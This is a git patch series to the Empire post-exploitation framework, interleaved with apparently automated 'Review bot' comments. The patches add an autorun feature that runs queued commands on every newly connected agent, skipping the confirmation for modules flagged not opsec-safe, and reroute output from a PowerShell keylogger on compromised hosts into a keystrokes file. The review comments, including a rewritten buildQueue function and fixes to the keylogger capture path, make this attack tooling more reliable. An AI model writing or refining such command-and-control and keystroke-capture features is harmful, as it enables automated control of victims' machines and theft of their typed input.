--- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -93,12 +93,13 @@ class MainMenu(cmd.Cmd): self.stagers = stagers.Stagers(self, args=args) self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) + self.resourceQueue = [] + self.autoRuns = [] + self.handle_args() dispatcher.send('[*] Empire starting up...', sender="Empire") - self.resourceQueue = [] - # print the loading menu messages.loading() @@ -138,6 +139,14 @@ class MainMenu(cmd.Cmd): Handle any passed arguments. """ + if self.args.resource: + resourceFile = self.args.resource[0] + if os.path.isfile(resourceFile): + self.do_resource(resourceFile) + else: + print helpers.color("\n[!] The resource file specified does not exist '%s'\n" % (resourceFile)) + time.sleep(5) + if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager if self.args.listener: @@ -267,7 +276,7 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" - if self.resourceQueue and len(self.resourceQueue) > 0: + if len(self.resourceQueue) > 0: self.cmdqueue.append(self.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) @@ -377,10 +386,9 @@ class MainMenu(cmd.Cmd): ################################################### def postcmd(self, stop, line): - if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue.append(self.resourceQueue.pop(0)) - - + if len(self.resourceQueue) > 0: + nextcmd = self.resourceQueue.pop(0) + self.cmdqueue.append(nextcmd) def default(self, line): "Default handler." @@ -388,7 +396,6 @@ class MainMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - self.resourceQueue = [] with open(arg) as f: self.resourceQueue.extend(f.read().splitlines()) 
@@ -437,7 +444,6 @@ class MainMenu(cmd.Cmd): stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") - except Exception as e: raise e @@ -904,18 +910,22 @@ class SubMenu(cmd.Cmd): self.mainMenu = mainMenu def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + if len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): pass + def postcmd(self, stop, line): if line == "back": return True - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + if len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + if nextcmd == "lastautoruncmd": + raise Exception("endautorun") + self.cmdqueue.append(nextcmd) def do_back(self, line): "Go back a menu." @@ -935,7 +945,6 @@ class SubMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -979,6 +988,21 @@ class AgentsMenu(SubMenu): "Go back to the main menu." raise NavMain() + def do_autorun(self, arg): + "Read and execute a list of Empire commands from a file and execute on each new agent. Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + if arg == "show": + print self.mainMenu.autoRuns + elif arg == "clear": + self.mainMenu.autoRuns = [] + else: + self.mainMenu.autoRuns = [] + with open(arg) as f: + cmds = f.read().splitlines() + #don't prompt for user confirmation when running autorun commands + noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] + self.mainMenu.autoRuns.extend(noPromptCmds) + + def do_list(self, line): "Lists all active agents (or listeners)." 
@@ -1447,14 +1471,15 @@ class AgentMenu(SubMenu): agentLanguage = mainMenu.agents.get_language_db(sessionID) - if agentLanguage.lower() == 'powershell': - agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - elif agentLanguage.lower() == 'python': - agent_menu = PythonAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - else: - print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + if agentLanguage.lower() == 'powershell': + agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + elif agentLanguage.lower() == 'python': + agent_menu = PythonAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + else: + print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + class PowerShellAgentMenu(SubMenu): """ @@ -2617,6 +2642,7 @@ class PythonAgentMenu(SubMenu): # Strip asterisks added by MainMenu.complete_usemodule() module = "python/%s" %(line.strip().rstrip("*")) + if module not in self.mainMenu.modules.modules: print helpers.color("[!] Error: invalid module") else: @@ -3085,7 +3111,7 @@ class ModuleMenu(SubMenu): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - def validate_options(self): + def validate_options(self, prompt): "Ensure all required module options are completed." # ensure all 'Required=True' options are filled in @@ -3119,8 +3145,9 @@ class ModuleMenu(SubMenu): print helpers.color("[!] Error: module needs to run in an elevated context.") return False - # if the module isn't opsec safe, prompt before running - if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + # if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued) + if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + try: choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red")) if not (choice.lower() != "" and choice.lower()[0] == "y"): 
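Review bot: validate_options gains a required positional `prompt` in this hunk, so any caller other than the do_execute updated in the next hunk (none are visible here) now fails with TypeError; `def validate_options(self, prompt=True):` keeps the old call form working and documents the default. The docstring should also mention the parameter, e.g. `"Ensure all required module options are completed; prompt=False skips the opsec-safe confirmation."`. The method body continues past the end of the hunk.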
@@ -3227,7 +3254,11 @@ class ModuleMenu(SubMenu): def do_execute(self, line): "Execute the given Empire module." - if not self.validate_options(): + prompt = True + if line == "noprompt": + prompt = False + + if not self.validate_options(prompt): return if self.moduleName.lower().startswith('external/'): From e38662b38497b7481d0e937454405fba97a8d896 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 12:55:09 -0600 Subject: [PATCH 11/15] specify the agent language for the autorun, powershell or python for example --- lib/common/agents.py | 2 +- lib/common/empire.py | 48 +++++++++++++++++++++++++++++++++++--------- 2 files changed, 39 insertions(+), 11 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 351d162..329f1c6 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1345,7 +1345,7 @@ class Agents: if len(self.mainMenu.autoRuns) > 0: autorunCmds = ["interact %s" % sessionID] - autorunCmds.extend(self.mainMenu.autoRuns) + autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) autorunCmds.extend(["lastautoruncmd"]) self.mainMenu.resourceQueue.extend(autorunCmds) try: diff --git a/lib/common/empire.py b/lib/common/empire.py index 1ff1ccb..ae3dff4 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -94,7 +94,8 @@ class MainMenu(cmd.Cmd): self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) self.resourceQueue = [] - self.autoRuns = [] + #A hashtable of autruns based on agent language + self.autoRuns = {} self.handle_args() 
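Review bot: When `line == "noprompt"` turns off the opsec-safe confirmation, do_execute prints nothing, so the operator's console carries no record that a module marked not opsec-safe ran without confirmation; a line before the `validate_options(prompt)` call, `if not prompt: print helpers.color("[*] 'execute noprompt' given, skipping opsec-safe confirmation for %s" % self.moduleName, "red")`, keeps that visible in the session output. The comparison is also against the exact argument, so any other text after `execute` is silently ignored rather than reported. do_execute continues past the hunk.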
@@ -988,19 +989,46 @@ class AgentsMenu(SubMenu): "Go back to the main menu." raise NavMain() - def do_autorun(self, arg): - "Read and execute a list of Empire commands from a file and execute on each new agent. Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" - if arg == "show": - print self.mainMenu.autoRuns - elif arg == "clear": - self.mainMenu.autoRuns = [] + def do_autorun(self, line): + "Read and execute a list of Empire commands from a file and execute on each new agent \"autorun \" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + line = line.strip() + if not line: + print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'") + return + cmds = line.split(' ') + resourceFile = cmds[0] + language = None + if len(cmds) > 1: + language = cmds[1] + elif not resourceFile == "show" and not resourceFile == "clear": + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 
'autorun /root/res.rc powershell' or 'autorun /root/res.rc pythono'") + return + #show the current autorun settings by language or all + if resourceFile == "show": + if language: + if self.mainMenu.autoRuns.has_key(language): + print self.mainMenu.autoRuns[language] + else: + print "No autorun commands for language %s" % language + else: + print self.mainMenu.autoRuns + #clear autorun settings by language or all + elif resourceFile == "clear": + if language and not language == "all": + if self.mainMenu.autoRuns.has_key(language): + self.mainMenu.autoRuns.pop(language) + else: + print "No autorun commands for language %s" % language + else: + #clear all autoruns + self.mainMenu.autoRuns.clear() + #read in empire commands from the specified resource file else: - self.mainMenu.autoRuns = [] - with open(arg) as f: + with open(resourceFile) as f: cmds = f.read().splitlines() #don't prompt for user confirmation when running autorun commands noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] - self.mainMenu.autoRuns.extend(noPromptCmds) + self.mainMenu.autoRuns[language] = noPromptCmds def do_list(self, line): From 21e56bcc3e6128122c93bcff608cc40d29408eb8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 14:04:30 -0600 Subject: [PATCH 12/15] make sure autorun exists for agent language --- lib/common/agents.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 329f1c6..1604fb6 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py 
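Review bot: do_autorun never checks `language` against the languages an agent can actually have, so a typo such as the `pythono` in its own error text stores an autorun under a key no agent will match and it silently never fires; the agent-menu dispatch in this series (@@ -1447 in patch 10) recognises only 'powershell' and 'python', so a check after the language is parsed, `if language and language not in ("powershell", "python"): print helpers.color("[!] Unknown agent language '%s'" % language); return`, would catch it. `cmds = line.split(' ')` also yields empty tokens on repeated spaces; `line.split()` is the usual form. The docstring's usage example appears to have lost its placeholders (`"autorun \"`), possibly an extraction artifact; it should read `autorun <resource file> <language>`. This hunk spans two physical lines because its error string was broken across them.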
@@ -1343,7 +1343,7 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) - if len(self.mainMenu.autoRuns) > 0: + if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0: autorunCmds = ["interact %s" % sessionID] autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) autorunCmds.extend(["lastautoruncmd"]) From 7e56e552a6acdec1eff396ac8a0c0156615c91dc Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 16:28:19 -0600 Subject: [PATCH 13/15] typo correction --- lib/common/empire.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index ae3dff4..dc9e16a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -999,9 +999,9 @@ class AgentsMenu(SubMenu): resourceFile = cmds[0] language = None if len(cmds) > 1: - language = cmds[1] + language = cmds[1].lower() elif not resourceFile == "show" and not resourceFile == "clear": - print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc pythono'") + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'") return #show the current autorun settings by language or all if resourceFile == "show": From 30da1bced1cf2f883e3989e8d28dac46feabb4e1 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Tue, 17 Oct 2017 10:25:19 -0600 Subject: [PATCH 14/15] add ability call resource within a resource file --- lib/common/empire.py | 45 +++++++++++++++++++++++++++++--------------- 1 file changed, 30 insertions(+), 15 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index dc9e16a..23e4a57 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py 
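Review bot: `language.lower()` is evaluated three times across the new condition and the line after it; binding it once, `lang = language.lower()` followed by `cmds = self.mainMenu.autoRuns.get(lang)` and `if cmds:`, reads more clearly and drops the `has_key` call, which exists only in Python 2. The enclosing method starts before the hunk.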
@@ -139,14 +139,9 @@ class MainMenu(cmd.Cmd): """ Handle any passed arguments. """ - if self.args.resource: resourceFile = self.args.resource[0] - if os.path.isfile(resourceFile): - self.do_resource(resourceFile) - else: - print helpers.color("\n[!] The resource file specified does not exist '%s'\n" % (resourceFile)) - time.sleep(5) + self.do_resource(resourceFile) if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager @@ -397,8 +392,32 @@ class MainMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - with open(arg) as f: - self.resourceQueue.extend(f.read().splitlines()) + self.resourceQueue.extend(self.buildQueue(arg)) + + def buildQueue(self, resourceFile, autoRun=False): + cmds = [] + if os.path.isfile(resourceFile): + with open(resourceFile, 'r') as f: + lines = [] + lines.extend(f.read().splitlines()) + else: + raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile) + for lineFull in lines: + line = lineFull.strip() + #ignore lines that start with the comment symbol (#) + if line.startswith("#"): + continue + #read in another resource file + elif line.startswith("resource "): + rf = line.split(' ')[1] + cmds.extend(self.buildQueue(rf, autoRun)) + #add noprompt option to execute without user confirmation + elif autoRun and line == "execute": + cmds.append(line + " noprompt") + else: + cmds.append(line) + + return cmds def do_exit(self, line): "Exit Empire" @@ -928,6 +947,7 @@ class SubMenu(cmd.Cmd): raise Exception("endautorun") self.cmdqueue.append(nextcmd) + def do_back(self, line): "Go back a menu." return True 
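Review bot: Dropping the `os.path.isfile` check here moves the missing-file case into `buildQueue`, which raises a bare `Exception` (hunk `@@ -397` below); nothing in this hunk catches it, so a bad `--resource` path now aborts startup with a traceback instead of the message and pause that were removed. Wrap the call: `try: self.do_resource(resourceFile)` / `except Exception as e: print helpers.color("\n[!] %s\n" % e)`. The same uncaught path exists at the other callers of `buildQueue`, `SubMenu.do_resource` (`@@ -946`) and the autorun branch in `AgentsMenu` (`@@ -1024`), where a typo in the filename would likely propagate out of the menu loop. The enclosing method continues outside the hunk.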
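Review bot: `buildQueue` recurses on every `resource ` line with no guard, so a file that includes itself, or two files that include each other, recurses until Python raises RuntimeError rather than a readable error. `rf = line.split(' ')[1]` also raises IndexError on a bare `resource` line and truncates any path that contains a space. The rewrite below threads a tuple of ancestor paths through the recursion, rejects a cycle with the same `Exception` style the hunk already uses, and takes the rest of the line as the path. Blank lines are currently queued as empty commands, and `cmd.Cmd.emptyline` repeats the previous command unless the menu overrides it, so skipping them in the loop is safer. A docstring such as `"Return the command list for resourceFile, expanding nested 'resource' lines; autoRun adds 'noprompt' to execute."` would also help.
```python
    def buildQueue(self, resourceFile, autoRun=False, _parents=()):
        """Return the command list for resourceFile, expanding nested 'resource' lines.

        autoRun appends ' noprompt' to bare 'execute' lines; _parents is the chain
        of files currently being expanded, used to reject include cycles.
        """
        if not os.path.isfile(resourceFile):
            raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile)
        fullPath = os.path.abspath(resourceFile)
        if fullPath in _parents:
            raise Exception("[!] Error: The resource file \"%s\" includes itself" % resourceFile)
        with open(fullPath, 'r') as f:
            lines = f.read().splitlines()
        cmds = []
        for lineFull in lines:
            line = lineFull.strip()
            # skip blank lines and comments so nothing reaches cmd.Cmd.emptyline
            if not line or line.startswith("#"):
                continue
            elif line.startswith("resource "):
                # everything after the keyword is the path, so spaces survive
                rf = line[len("resource "):].strip()
                cmds.extend(self.buildQueue(rf, autoRun, _parents + (fullPath,)))
            elif autoRun and line == "execute":
                cmds.append(line + " noprompt")
            else:
                cmds.append(line)
        return cmds
```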
@@ -946,8 +966,7 @@ class SubMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) + self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg)) def do_exit(self, line): "Exit Empire." @@ -1024,11 +1043,7 @@ class AgentsMenu(SubMenu): self.mainMenu.autoRuns.clear() #read in empire commands from the specified resource file else: - with open(resourceFile) as f: - cmds = f.read().splitlines() - #don't prompt for user confirmation when running autorun commands - noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] - self.mainMenu.autoRuns[language] = noPromptCmds + self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True) def do_list(self, line): From 6a283719f34f5f686c42edfec2b25bd8531fcc98 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Tue, 17 Oct 2017 14:28:25 -0600 Subject: [PATCH 15/15] fix PS keylogger bug where it only logged to file while you were interacting with the agent --- lib/common/agents.py | 17 +++++++++++++++-- lib/common/empire.py | 20 ++++---------------- 2 files changed, 19 insertions(+), 18 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 1604fb6..965c9be 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1509,6 +1509,7 @@ class Agents: """ agentSessionID = sessionID + keyLogTaskID = None # see if we were passed a name instead of an ID nameid = self.get_agent_id_db(sessionID) @@ -1533,6 +1534,7 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: 
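Review bot: `self.mainMenu.buildQueue(resourceFile, True)` passes the `autoRun` flag positionally, which hides what the bare `True` means at the call site; `self.mainMenu.buildQueue(resourceFile, autoRun=True)` reads as the parameter it sets. The enclosing method starts outside the hunk.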
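Review bot: `.fetchone()[0]` raises TypeError when no tasking matching `Get-Keystrokes` exists for the agent, which is the case for every result append from an agent that was never tasked with the keylogger, since this `else` branch runs for all updated results; split it: `row = cur.execute(...).fetchone()` / `keyLogTaskID = row[0] if row else None`, which also keeps the `keyLogTaskID = None` fallback added at `@@ -1509`. The LIKE literal is written in double quotes, which SQLite accepts only as a legacy fallback when no such identifier exists; write it as `data LIKE 'function Get-Keystrokes%'`. Without an ORDER BY, an agent with several keylogger taskings gets an arbitrary one matched. The enclosing method starts and ends outside the hunk.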
@@ -1717,9 +1719,20 @@ class Agents: elif responseName == "TASK_CMD_JOB": + #check if this is the powershell keylogging task, if so, write output to file instead of screen + if keyLogTaskID and keyLogTaskID == taskID: + safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) + savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) + if not os.path.abspath(savePath).startswith(safePath): + dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') + return + with open(savePath,"a+") as f: + new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") + f.write(new_results) + else: + # dynamic script output -> non-blocking + self.update_agent_results_db(sessionID, data) - # dynamic script output -> non-blocking - self.update_agent_results_db(sessionID, data) # update the agent log self.save_agent_log(sessionID, data) diff --git a/lib/common/empire.py b/lib/common/empire.py index 23e4a57..9693504 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -739,7 +739,6 @@ class MainMenu(cmd.Cmd): name = line.strip() sessionID = self.agents.get_agent_id_db(name) - if sessionID and sessionID != '' and sessionID in self.agents.agents: AgentMenu(self, sessionID) else: 
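Review bot: The traversal warning uses `self.sessionID`, but this is the `Agents` class and the hunk itself uses the local `sessionID` two lines above for `savePath`; the message appears to be copied from the agent menu (the removed lines at `@@ -1560` use it with `self.sessionID`), so on the very path the check guards it would raise AttributeError instead of being sent — use `% sessionID`. The containment check compares against `safePath` without a trailing separator, so a sibling directory whose name merely starts with `downloads` would pass; compare with `os.path.abspath(savePath).startswith(safePath + os.sep)`. The enclosing method starts outside the hunk.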
@@ -1560,27 +1559,17 @@ class PowerShellAgentMenu(SubMenu): """ Handle agent event signals. """ + if '[!] Agent' in signal and 'exiting' in signal: pass name = self.mainMenu.agents.get_agent_name_db(self.sessionID) - if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal): # display any results returned by this agent that are returned - # while we are interacting with it + # while we are interacting with it, unless they are from the powershell keylogger results = self.mainMenu.agents.get_agent_results_db(self.sessionID) - if results: - if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results): - safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) - savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID) - if not os.path.abspath(savePath).startswith(safePath): - dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') - return - with open(savePath,"a+") as f: - new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") - f.write(new_results) - else: - print "\n" + results + if results and not sender == "AgentsPsKeyLogger": + print "\n" + results elif "[+] Part of file" in signal and "saved" in signal: if (str(self.sessionID) in signal) or (str(name) in signal): @@ -1758,7 +1747,6 @@ class PowerShellAgentMenu(SubMenu): self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command) - # update the agent log msg = "Tasked agent to kill process: " + str(process) self.mainMenu.agents.save_agent_log(self.sessionID, msg)
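Review bot: `if results and not sender == "AgentsPsKeyLogger":` is the negated-equality form; `if results and sender != "AgentsPsKeyLogger":` is the idiomatic spelling and reads as the condition it is. The new comment could also say where keylogger output now goes, e.g. `# keylogger output is written to downloads/<session>/keystrokes.txt by Agents instead`, so the next reader does not think it is discarded. The enclosing handler continues outside the hunk.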